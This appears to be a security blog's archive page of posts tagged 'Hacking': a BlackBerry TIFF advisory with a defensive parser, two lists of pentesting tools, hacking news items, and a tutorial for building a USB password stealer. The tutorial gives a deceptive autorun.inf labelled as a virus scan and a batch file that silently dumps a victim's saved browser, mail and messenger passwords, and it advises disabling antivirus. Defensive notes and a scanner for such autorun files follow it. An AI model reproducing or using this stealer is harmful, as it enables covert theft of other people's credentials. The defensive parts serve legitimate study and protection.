Posts Tagged ‘Hacking’


If you are a BlackBerry Enterprise Network user, here is something you need to be careful about. BlackBerry Enterprise Server (BES) users have been warned that an image-based exploit could allow hackers to access and execute code on the servers used to support corporate users of BlackBerry smartphones.

The flaw has been rated as high severity. The actual vulnerability in BlackBerry Enterprise Server results from how the server processes image files.

Scenario to Exploit Vulnerability: A malicious person writes special code and embeds it in a TIFF image file. The person then convinces a BlackBerry smartphone user (whose phone is connected to a corporate BES) to view the TIFF file.

As soon as the image file loads on the phone, the code runs on the Blackberry Enterprise server and either opens up a back door in the network or causes the network to crash altogether as instructed in the basic code.

“RIM is not aware of any attacks on or specifically targeting BlackBerry Enterprise Server customers, and recommends that affected customers update to the latest available software version to be fully protected from these vulnerabilities,” BlackBerry said.

The exploit uses a TIFF image containing malicious code, and the dangerous image can either be linked to an email or attached directly to it. Depending on the privileges available to the configured BlackBerry Enterprise Server service account, the attacker might also be able to extend access to other non-segmented parts of the network.

Only BlackBerry Enterprise Server Express version 5.0.4 and earlier for Microsoft Exchange and IBM Lotus Domino, and BlackBerry Enterprise Server version 5.0.4 and earlier for Microsoft Exchange, IBM Lotus Domino and Novell GroupWise, are affected.

For the full RIM statement, issue and resolution visit: Knowledge Base Article BSRT-2013-003
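The risk in the post above is a server parsing attacker-supplied image structure. As an added illustration, written for this page and neither RIM's code nor the actual BES bug, the Python below walks a TIFF's IFD chain the way a hardened parser must: every offset and length is checked against the file size before it is dereferenced, so the constructed malformed samples are rejected rather than followed. The byte strings are constructed here; the layout it checks (byte-order mark, magic 42, 12-byte IFD entries, 4-byte next-IFD pointer) is the TIFF 6.0 format.

```python
import struct

# Byte sizes of the TIFF 6.0 field types (BYTE, ASCII, SHORT, LONG, RATIONAL, ...).
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}
MAX_IFDS = 64  # refuse absurd IFD chains instead of looping on them


def parse_tiff(data):
    """Walk the IFD chain of a TIFF and return its (tag, type, count, value) entries.
    Every file offset is checked against len(data) before it is dereferenced,
    which is exactly the check an unsafe image parser omits."""
    if len(data) < 8:
        raise ValueError("too short for a TIFF header")
    if data[:2] == b"II":
        end = "<"          # little-endian
    elif data[:2] == b"MM":
        end = ">"          # big-endian
    else:
        raise ValueError("bad byte-order mark")
    magic, ifd_off = struct.unpack(end + "HI", data[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    entries, seen = [], set()
    while ifd_off != 0:
        if ifd_off in seen or len(seen) >= MAX_IFDS:
            raise ValueError("IFD chain loops or is too long")
        seen.add(ifd_off)
        if ifd_off + 2 > len(data):
            raise ValueError("IFD offset outside file")
        (count,) = struct.unpack(end + "H", data[ifd_off:ifd_off + 2])
        # 12 bytes per entry plus the 4-byte next-IFD pointer must fit in the file.
        # (In C this multiplication is itself an integer-overflow hazard; Python ints do not wrap.)
        next_ptr = ifd_off + 2 + 12 * count
        if next_ptr + 4 > len(data):
            raise ValueError("IFD entries outside file")
        for i in range(count):
            pos = ifd_off + 2 + 12 * i
            tag, typ, n, val = struct.unpack(end + "HHII", data[pos:pos + 12])
            if typ not in TYPE_SIZES:
                raise ValueError("unknown field type %d" % typ)
            total = TYPE_SIZES[typ] * n
            # Values wider than 4 bytes live elsewhere in the file; 'val' is then an offset.
            if total > 4 and val + total > len(data):
                raise ValueError("tag %d data outside file" % tag)
            entries.append((tag, typ, n, val))
        (ifd_off,) = struct.unpack(end + "I", data[next_ptr:next_ptr + 4])
    return entries


def is_safe_tiff(data):
    """True if the structure validates, False if any offset/size check fails."""
    try:
        parse_tiff(data)
        return True
    except ValueError:
        return False


def _entry(tag, typ, count, value):
    return struct.pack("<HHII", tag, typ, count, value)


# Constructed samples (little-endian, width/length tags only, no pixel data).
GOOD_TIFF = (b"II" + struct.pack("<HI", 42, 8)
             + struct.pack("<H", 2) + _entry(256, 3, 1, 4) + _entry(257, 3, 1, 4)
             + struct.pack("<I", 0))
# First IFD pointer points far past the end of the 38-byte file.
BAD_IFD_OFFSET = b"II" + struct.pack("<HI", 42, 0x1000) + GOOD_TIFF[8:]
# An ASCII tag (type 2) claiming 100 bytes at offset 0x20 in a 38-byte file.
BAD_TAG_DATA = (b"II" + struct.pack("<HI", 42, 8)
                + struct.pack("<H", 2) + _entry(256, 3, 1, 4) + _entry(270, 2, 100, 0x20)
                + struct.pack("<I", 0))

if __name__ == "__main__":
    for name, blob in [("good", GOOD_TIFF), ("bad ifd offset", BAD_IFD_OFFSET),
                       ("bad tag data", BAD_TAG_DATA)]:
        print(name, "->", "accepted" if is_safe_tiff(blob) else "rejected")
```

The point for a defender is the shape of the checks, not this particular parser: any server-side image handler that trusts an offset or a count read from the file, or that computes `size * count` in a fixed-width integer without an overflow check, is the kind of code this advisory class comes from, and pre-filtering uploads with a strict structural validator is a cheap layer in front of it.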


Here is a list of my favorite old & new school information security & hacking tools: 

Burpsuite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Cain & Abel

Cain & Abel is a password-cracking juggernaut that runs on Windows. This amazing software, created by Massimiliano Montoro, features more than a dozen different useful capabilities for cracking passwords and various encryption keys. For starters, Cain can dump and reveal various encrypted or hashed passwords cached on a local Windows machine, including the standard Windows LANMAN and NTLM password representations, as well as application-specific passwords for Microsoft’s Outlook, Internet Explorer and MSN Explorer. Organizations can use Cain to test individual passwords and the effectiveness of their password policies. Cain & Abel can crack passwords for over a dozen different OS and protocol types. Just for the Windows operating system alone, Cain handles the LANMAN and NTLM password representations in the SAM database, as well as Windows network authentication protocols such as LANMAN Challenge and Response, NTLMv1, NTLMv2 and Microsoft Kerberos. Its integrated sniffer monitors the LAN, grabbing challenge-and-response packets and cracking passwords using a built-in dictionary of more than 306,000 words. Beyond Windows passwords, Cain also cracks various Cisco passwords, routing protocol hashes, VNC passwords, RADIUS Shared Secrets, Win95/98 Password List (PWL) files, and Microsoft SQL Server 2000 and MySQL passwords. It can also crack IKE pre-shared keys in order to penetrate IPSec VPNs that use IKE to exchange and to update their cryptography keys. Beyond password cracking, Cain includes a wireless LAN discovery tool, a hash calculator and an ARP cache-poisoning tool (which can be used to redirect traffic on a LAN so that an attacker can more easily sniff in a switched environment), all bound together in a sophisticated GUI.

Dsniff

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

Ettercap

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN.

Fast-track 

Fast-track is an open source security tool aimed at helping penetration testers conduct highly advanced and time consuming attacks in a more methodical and automated way. Fast-Track is now included in Backtrack version 3 onwards under the Backtrack –> Penetration category. In this talk given at Shmoocon 2009, the author of Fast-Track Dave Kennedy runs us through a primer on the tool and demonstrates 7 different scenarios in which he breaks into systems using the Fast-Track tool. These scenarios include automated SQL injection, MSSQL brute forcing, Query string pwnage, Exploit rewrite, Destroying the Client and Autopwnage.

Fport

fport identifies all open TCP/IP and UDP ports and maps them to the owning application.

GFI LANguard

GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Hping

hping is a command-line oriented TCP/IP packet assembler/analyser. The interface is inspired by the ping(8) Unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files over a covert channel, and many other features. Kind of like the ping program (but with a lot of extensions).

IP Filter

IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

John the Ripper

John the Ripper is a fast password cracker, currently available for many flavours of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.

Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.  It separates and identifies different wireless networks in the area.

Metasploit Community Edition

Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence. Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only.

Ncat

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.

Nessus

The Nessus Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavours of Unix.

Netcat

Netcat has been dubbed the network Swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using the TCP or UDP protocol.

NetFilter

NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packet mangling.

NexPose Community edition 

The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features.

Nikto2

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.

Nmap

Nmap (Network Mapper) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

OpenPGP

OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

OpenSSH

OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

Paros Proxy

Many custom Web apps are vulnerable to SQL injection, cross-site scripting, session cloning and other attacks. Attackers often rely on a specialized Web proxy tool designed to manipulate Web applications to reveal and exploit such flaws, and so must you. A Web app manipulation proxy sits between the attacker’s browser and the target Web server. All HTTP and HTTPS requests and responses are channelled through the proxy, which gives the attacker a window to view and alter all of the information passed in the browsing session, including any variables passed by the Web app in cookies, hidden form elements and URLs. Paros Proxy, which runs on Windows or Linux (with a Java Runtime Environment), is the best of these proxies, chock-full of Web app assessment widgets that make it a versatile and powerful hacking tool:

  1. Recorder. Paros goes beyond similar tools by maintaining a thorough history of all HTTP requests and responses. Later, the attacker can review all of the actions, with every page, variable and other element recorded for detailed analysis.
  2. Web spider. An automated Web spider surfs every linked page on a target site, storing its HTML locally for later inspection, and harvests URLs, cookies and hidden form elements for later attack.
  3. Hash calculator. Attackers sometimes have a hunch about the encoding or hashing of specific data elements that are returned. Using the Paros calculator, a hacker can quickly and easily test such hunches. Paros Proxy has a GUI tool for calculating the SHA-1, MD5 and Base64 value of any arbitrary text typed in by its user or pasted from an application.
  4. SSL-buster. While most other Web app attack and assessment proxies handle server-side SSL certificates, Paros can also probe apps that require client-side SSL certificates.

Paros also includes automated vulnerability scanning and detection capabilities for some of the most common Web application attacks, including SQL injection and cross-site scripting. Paros even scans for unsafe Web content, such as unsigned ActiveX controls and browser exploits sent by the target Web server.

Pf

OpenBSD Packet Filter

SAINT

SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

Snort

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

TCPdump

TCPdump is the most used network sniffer/analyser for UNIX.

TCPTrace

TCPTrace analyses the dump file format generated by TCPdump and other applications.

THC-Hydra

A very fast network logon cracker which supports many different services.

TripWire

Tripwire is a tool that can be used for data and program integrity assurance.

W3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

Webscarab

WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned.

Wellenreiter

A passive WLAN detector. While numerous tools detect wireless LANs, one of the very best is Wellenreiter. Traditional war driving tools, such as the popular NetStumbler, send a barrage of probe request packets to find wireless access points. But NetStumbler can’t locate an access point that’s configured to ignore probe requests from clients that don’t know the WLAN SSID. Max Moser’s Wellenreiter can. Wellenreiter is completely passive; instead of sending probe requests, it puts a wireless card into so-called “rfmon mode,” so that it sniffs wireless traffic, capturing all data sent, including the entire wireless frames of all packets with their associated SSIDs, displaying the discovered access points in its GUI. It then listens for ARP or DHCP traffic to determine the MAC and IP addresses of each discovered wireless device. Wellenreiter can store wireless packets in a tcpdump or Wireshark packet capture file for later detailed analysis. An attacker or wireless penetration tester can fire up Wellenreiter, let the tool run passively for an hour or so, and return to find a nifty inventory of nearby wireless devices. It can also interface with GPS devices, storing the physical location of the war-driving computer when wireless LANs are detected. Wellenreiter runs on Linux and supports Prism2, Lucent and Cisco wireless cards.

Wikto

You need a solid Web server vulnerability scanner if you’re going to find flaws before attackers do. Internet-facing Web apps open enormous business opportunities, and dangerous holes for malicious and criminal hackers. In the last year, thousands of sites running vulnerable phpBB Web forum scripts, and countless others hosting the AWStats CGI script for gathering access statistics from log files, have fallen victim to attackers. Beyond those notable examples, vulnerabilities in various Web scripts are discovered on a regular basis. To help find such flaws in your network, turn to Wikto, an impressive Web server scanning tool. Written by SensePost, a security services firm based in South Africa, Wikto builds on the popular command-line Nikto Web scanner Perl script with an easy-to-use Windows GUI and extended capabilities. Like Nikto, Wikto searches for thousands of flawed scripts, common server misconfigurations and unpatched systems. Wikto adds HTTP fingerprinting technology to identify Web server types based on their protocol behaviour, even if administrators purposely disguise Web server banner information to deceive attackers. For white hats, it’s a powerful inventory feature. What’s more, attackers are increasingly turning to well-crafted Google searches to look for vulnerable sites. Security researcher Johnny Long maintains the Google Hacking Database (GHDB) list of more than 1,000 Google searches that can locate vulnerable systems. Wikto can import the latest GHDB vulnerability list, and then query Google for such holes in your domain.

Winfingerprint

A Windows configuration harvester. Windows systems contain a treasure trove of sensitive configuration information that’s accessible in a variety of ways. Attackers and assessment teams typically extract as much information as possible from Windows systems to help refine and augment their vulnerability scans. Winfingerprint, written by Vacuum, is an invaluable tool for harvesting Windows configuration information, using a variety of mechanisms, including Windows domain access, Active Directory and Windows Management Instrumentation (WMI), Microsoft’s comprehensive framework for analysing system configurations. Winfingerprint pulls lists of users, groups and security settings from a single Windows machine or a network range. The tool also grabs information about the local hard drives of target machines, local system time and date, registry settings, and event logs. Rounding out its features, this handy tool includes a Simple Network Management Protocol (SNMP) scanner, as well as a TCP and UDP port scanner, all accessible from a single GUI.

Wireshark

Wireshark is a network protocol analyser. It lets you capture and interactively browse the traffic running on a computer network.


British MI6 intelligence officers hacked into the Islamic extremist website and magazine, Inspire, and replaced bomb-making instructions with a recipe on how to make cupcakes, media reports said on Friday.

The incident marks the first time that foreign agents were able to breach and alter the website, which is reported to be linked with al-Qaeda on the Arabian Peninsula (AQAP).

The magazine’s original page entitled “Make a Bomb in the Kitchen of Your Mom,” was corrupted, reported The Associated Press.

“We’re increasingly using cybertools as part of our work,” a U.K. foreign official told AP.

When a user attempts to download the PDF of the quarterly magazine page on how to make the bomb, they are redirected to scrambled computer code, reported The Daily Telegraph.

The code was placed into the 67-page magazine by the British intelligence officers and was actually a recipe for “The Best Cupcakes in America,” initially published on Ellen DeGeneres’s show, according to the newspaper. It also included a recipe for a Mojito Cupcake.

Just thought you might find this as funny as I did.


Hackers identifying as “KnightSec,” an arm of Anonymous, attacked the website of an Ohio high school football team to demand a public apology for the gang rape of a 16-year-old girl reportedly perpetrated by players.

Last weekend, the website of the locally celebrated Steubenville High School Big Red football team was replaced with a note and a video from the hackers in typical Anonymous style — a message from a Guy Fawkes mask and a computerized voice. KnightSec warned that it would release personal information including names and Social Security numbers of Big Red players and staff if an apology was not issued to the rape victim. The hackers also released “preliminary” information, which they called “a warning shot,” publishing names, addresses, phone numbers, and names of parents of 13 players allegedly involved in the rape.

“The town of Steubenville has been good at keeping this quiet and their star football team protected,” the KnightSec statement read.

Last week the New York Times reported on the disturbing assault in the small Ohio town. A 16-year-old girl was, according to prosecutors, gang raped and dragged from party to party by a number of star football players while she was too drunk to consent. Via the Times:

Twitter posts, videos and photographs circulated by some who attended the nightlong set of parties suggested that an unconscious girl had been sexually assaulted over several hours while others watched. She even might have been urinated on.

In one photograph posted on Instagram by a Steubenville High football player, the girl, who was from across the Ohio River in Weirton, W.Va., is shown looking unresponsive as two boys carry her by her wrists and ankles. Twitter users wrote the words “rape” and “drunk girl” in their posts.

Two 16-year-old Big Red players, Trent Mays and Ma’lik Richmond, are under house arrest on charges that they raped the girl. Their hearing is set for February. Meanwhile, many members of the Steubenville community have defended the players and blamed the rape victim for trying to defame their beloved team.


Caintech.co.uk

This post is of course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that Windows stores most of its passwords on a daily basis, such as MSN Messenger passwords, Yahoo passwords, Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember the password, the opportunity is jumped at. This shall be their undoing.


Things you will need:
Note: Before downloading the following apps you might want to disable your antivirus, as most of these will be flagged as suspicious files.

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview - IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected Storage PassView (PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1. First of all download all 5 tools and copy the executable files onto your USB drive, i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB drive.
2. Create a new Notepad file and write the following text into it.

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save the Notepad file and rename it from New Text Document.txt to autorun.inf.

Now copy the autorun.inf file onto your USB.


3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad file and rename it from New Text Document.txt to launch.bat.

Copy the launch.bat file also to your USB drive.
Now your USB password stealer is ready. All you have to do is insert it into the victim’s computer and a popup will appear; in the popup window select the option (Launch virus scan), and as soon as you click it the following window will appear.

After this you can see the saved passwords in .TXT files on the USB.
Have fun and hack responsibly
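From the defender's side, the durable artifact in the tutorial above is the autorun.inf itself. The Python below, added here and not part of the original post, parses an autorun.inf body and flags the two tell-tales the post's own file shows: a launch key (open=, shellexecute=, shell\open\command=) pointing at an executable or script, and an ACTION= label dressed up as a maintenance task. The sample texts are constructed; the first reproduces the file from the post.

```python
import configparser

# [autorun] keys that make Windows launch something (old AutoRun behaviour)
# and the file extensions that mean "code runs" rather than "data opens".
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")
EXEC_EXTS = (".exe", ".bat", ".cmd", ".com", ".pif", ".scr", ".vbs", ".js", ".wsf")
# Words a social-engineering label borrows to look like routine maintenance.
LURE_WORDS = ("virus", "scan", "update", "install", "repair")


def parse_autorun(text):
    """Return the [autorun] section of an autorun.inf body as a lowercase-key dict
    (empty dict if there is no such section). Section names are matched
    case-insensitively because Windows treats [AutoRun] and [autorun] alike."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "autorun":
            return {k.lower(): (v or "").strip() for k, v in cp.items(section)}
    return {}


def assess_autorun(text):
    """Return a list of human-readable findings; an empty list means the file only
    sets cosmetic keys such as label= or icon=."""
    auto = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        target = auto.get(key)
        if target and any(ext in target.lower() for ext in EXEC_EXTS):
            findings.append("%s= launches %r" % (key, target))
    action = auto.get("action", "")
    if action and any(word in action.lower() for word in LURE_WORDS):
        findings.append("action= shows a maintenance-themed label %r" % action)
    return findings


# Constructed samples. The first is the autorun.inf from the post above.
STEALER_INF = "[autorun]\n\nopen=launch.bat\n\nACTION= Perform a Virus Scan\n"
PHOTOS_INF = "[autorun]\nlabel=Holiday photos\nicon=photos.ico\n"
INSTALLER_INF = "; vendor disc\n[AutoRun]\nshellexecute=setup.exe /quiet\nlabel=Driver CD\n"

if __name__ == "__main__":
    for name, body in [("stealer", STEALER_INF), ("photos", PHOTOS_INF),
                       ("installer", INSTALLER_INF)]:
        print(name, "->", assess_autorun(body) or "nothing suspicious")
```

A scanner like this is for auditing removable media or a file share; the actual control is Windows' own AutoRun policy. Windows 7 already ignores autorun.inf on USB drives, Microsoft's update KB971029 backported that behaviour to XP and Vista, and setting the `NoDriveTypeAutoRun` policy to `0xFF` (Group Policy: "Turn off Autoplay" for all drives) disables it everywhere, so on a patched and policied machine the "Perform a Virus Scan" prompt never appears.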

Caintech.co.uk

1. Nmap

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap homepage.

2. Wireshark

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. Wireshark homepage.

3. Metasploit Community edition

Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence. Metasploit community edition homepage.

4. Nikto2

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Nikto2 homepage.

5. John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version. John the Ripper homepage.

6. ettercap

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. ettercap homepage.

7. NexPose Community edition

The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features. Nexpose homepage.

8. Ncat

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses. ncat homepage.

9. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. kismet homepage.

10. w3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af homepage.

11. hping

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired by the ping(8) Unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files over a covert channel, and many other features. hping homepage.

12. burpsuite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. BurpSuite homepage.

13. THC-Hydra

A very fast network logon cracker which supports many different services. hydra homepage.

14. sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. sqlmap homepage.

15. webscarab

WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned. WebScarab homepage.


Bulgarian authorities say that after months of investigation they have busted the “most powerful hacker group” in the country, the Cyber Warrior Invasion. The operation was conducted by Bulgaria’s Sector for Computer Crimes, Intellectual Property and Gambling and the territorial units of the Chief Directorate for Fight with Organized Crime in the municipalities of Pleven, Shumen, Plovdiv, Burgas, Haskovo, Stara Zagora and Kyustendil.
Using cyber “terrorist” methods, the group had attacked more than 500 websites worldwide, including those of financial institutions, web-based companies, and governmental and non-governmental organizations. On the confiscated computers, police discovered databases with large amounts of stolen emails, social network profiles and associated passwords, as well as stolen credit card data.
The site www.cwi-group.org was used by the members of the group to coordinate their activities. Constantly changing its location and using a complex system of “zombie” proxy servers, they disguised its true location, and that of the administrators. Despite the attempts to wipe out their tracks, the hackers were detected. The investigation unveiled that hacker group members followed a strict hierarchical order, evidencing the high degree of organization and coordination between them. They were structured into different groups according to their access and power: “Administrators”, “Moderator”, “Scanning team,” “Donors / Sponsors”, “Sectional moderators”, “Friends,” “VIP Members” and group “members.”
Four laptops, five desktop computers, seven portable digital information devices, three hard discs and over 200 CDs were seized.

A hacker who went by the online moniker of “Dr Smurf” on the underground DarkMarket cybercrime forum has pleaded guilty to charges of identity theft.

Tadas Petrauskas, a 23-year-old Lithuanian hacker who lives in Brick, New Jersey, was caught in 2008 after selling login names and passwords for $2,000 to an undercover FBI agent, and admitted breaking into computer systems and selling stolen credit card details via the DarkMarket website.

Unfortunately for Petrauskas, DarkMarket had been secretly under the control of FBI agents since 2006, who were using it as a means to gather information on those involved in computer crime.

The FBI were able to gather evidence from “Dr Smurf”’s email accounts, and arrested Petrauskas at JFK airport in New York, after he arrived on a flight from Belgium.

Petrauskas is scheduled to be sentenced on 30 October. Although unlikely that he will receive the maximum sentence, Petrauskas could technically face up to five years in prison for his crimes.

This shouldn’t need to be said, but let me say it anyway. Don’t hack into computers which don’t belong to you. Not for fun. Not for money. It’s against the law, and if you are caught the penalties you end up paying could be very serious.

If you’re interested in learning more about DarkMarket, you should read Elinor Mills’ great article at CNET where she interviewed FBI agent J Keith Mularski, who posed as a hacker called “Master Splynter”, to infiltrate the underground forum: Q&A: FBI agent looks back on time posing as a cybercriminal.